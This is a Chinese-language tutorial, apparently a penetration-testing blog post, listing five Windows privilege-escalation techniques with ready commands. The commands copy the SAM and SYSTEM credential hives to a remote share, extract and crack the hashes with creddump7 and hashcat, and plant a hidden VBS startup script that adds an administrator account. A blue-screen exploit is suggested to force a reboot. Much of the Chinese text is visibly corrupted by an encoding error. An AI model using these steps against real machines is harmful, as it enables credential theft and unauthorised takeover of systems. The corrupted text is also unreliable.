1.溢出漏洞提權(quán)

溢出提權(quán)攻擊的基本原理是，通過(guò)向目標(biāo)系統(tǒng)發(fā)送過(guò)長(zhǎng)的輸入數(shù)據(jù)，超出了程序所分配的緩沖區(qū)大小，導(dǎo)致溢出。攻擊者可以利用這個(gè)溢出的緩沖區(qū)來(lái)修改程序的執(zhí)行流，使其執(zhí)行惡意代碼或者達(dá)到提升權(quán)限的目的

可以使用windows提權(quán)輔助工具：

windows提權(quán)輔助工具

或windows提權(quán)輔助在線搜索工具：

windows提權(quán)輔助在線搜索工具

之后可以利用EXP進(jìn)行提權(quán)

---

2.計(jì)劃任務(wù)提權(quán)

查看計(jì)算機(jī)上以管理權(quán)限運(yùn)行的計(jì)劃任務(wù)：

schtasks /query /fo list /v > schtasks.txt

找到Root權(quán)限運(yùn)行的或其他管理員權(quán)限運(yùn)行的任務(wù)：

直接查看導(dǎo)出文檔的任務(wù)名：上例為\OneDrive Standalone Update Task-S-1-5-21-577854666-1229694714-980117232-1000

如果我們對(duì)以高權(quán)限運(yùn)行的任務(wù)所在目錄具有寫入權(quán)限，就可以使用惡意程序覆蓋掉原來(lái)的程序，那么任務(wù)定時(shí)執(zhí)行的時(shí)候會(huì)自動(dòng)執(zhí)行我們的提權(quán)腳本

---

3.SAM文件提權(quán)

SAM和SYSTEM文件位于C:\Windows\System32\config

在 Windows 運(yùn)行時(shí)，文件已鎖定：

文件的備份可能存在于C:\Windows\Repair or C:\Windows\System32\config\RegBack

實(shí)戰(zhàn)：

1、copy sam文件

copy C:\Windows\Repair\SAM  \\192.168.175.130\tools\
copy C:\Windows\Repair\SYSTEM  \\192.168.175.130\tools\

2、下載信用套件工具提取哈希

git clone https://github.com/Neohapsis/creddump7.git
python2 pwdump.py SYSTEM SAM

3、使用hashcat破解管理員用戶哈希

hashcat -m 1000 --force a9fdfa038c4b75ebc76dc855dd74f0da rockyou.txt

---

4.啟動(dòng)項(xiàng)提權(quán)

先找到系統(tǒng)啟動(dòng)項(xiàng)的位置：

1、Win + R 快捷鍵打開運(yùn)行窗口

2、輸入 shell:Startup，點(diǎn)擊“確定”即可

3、跳轉(zhuǎn)到自啟動(dòng)文件夾中

一般來(lái)講，默認(rèn)路徑是這個(gè)：C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp

在啟動(dòng)項(xiàng)中創(chuàng)建vbs或bat腳本：

vbs：
set wshshell=createobject("wscript.shell")
a=wshshell.run("cmd.exe /c net user 用戶名 密碼 /add",0)
b=wshshell.run("cmd.exe /c net localgroup administrators 用戶名 /add",0)bat：
net user 用戶名 密碼 /add
net localgroup administrators 用戶名 /add

接下來(lái)需要等待機(jī)器重啟并以較大權(quán)限的賬號(hào)登錄，暴力一點(diǎn)可以配合漏洞打藍(lán)屏poc強(qiáng)制重啟

bat腳本運(yùn)行時(shí)會(huì)有個(gè)dos彈一下，vbs不會(huì)彈，建議使用vbs腳本

---

5.不帶引號(hào)的服務(wù)路徑提權(quán)

當(dāng)Windows服務(wù)運(yùn)行時(shí)，會(huì)發(fā)生以下兩種情況之一。如果給出了可執(zhí)行文件，并且引用了完整路徑，則系統(tǒng)會(huì)按字面解釋它并執(zhí)行。但是，如果服務(wù)的二進(jìn)制路徑未包含在引號(hào)中，則操作系統(tǒng)將會(huì)執(zhí)行找到的空格分隔的服務(wù)路徑的第一個(gè)實(shí)例

路徑?jīng)]有包含在引號(hào)中，服務(wù)會(huì)按照以下順序依次執(zhí)行：

c:\program.exe
c:\program files.exe
c:\program files (x86)\grasssoft\macro.exe
c:\program files (x86)\grasssoft\macro expert\MacroService.exe

假如存在漏洞路徑，我們可以將木馬放到上面的路徑下，然后重啟機(jī)器，此時(shí)，反彈回來(lái)的shell，則是一個(gè)system的shell

使用以下命令查看系統(tǒng)中錯(cuò)誤配置的路徑：

wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """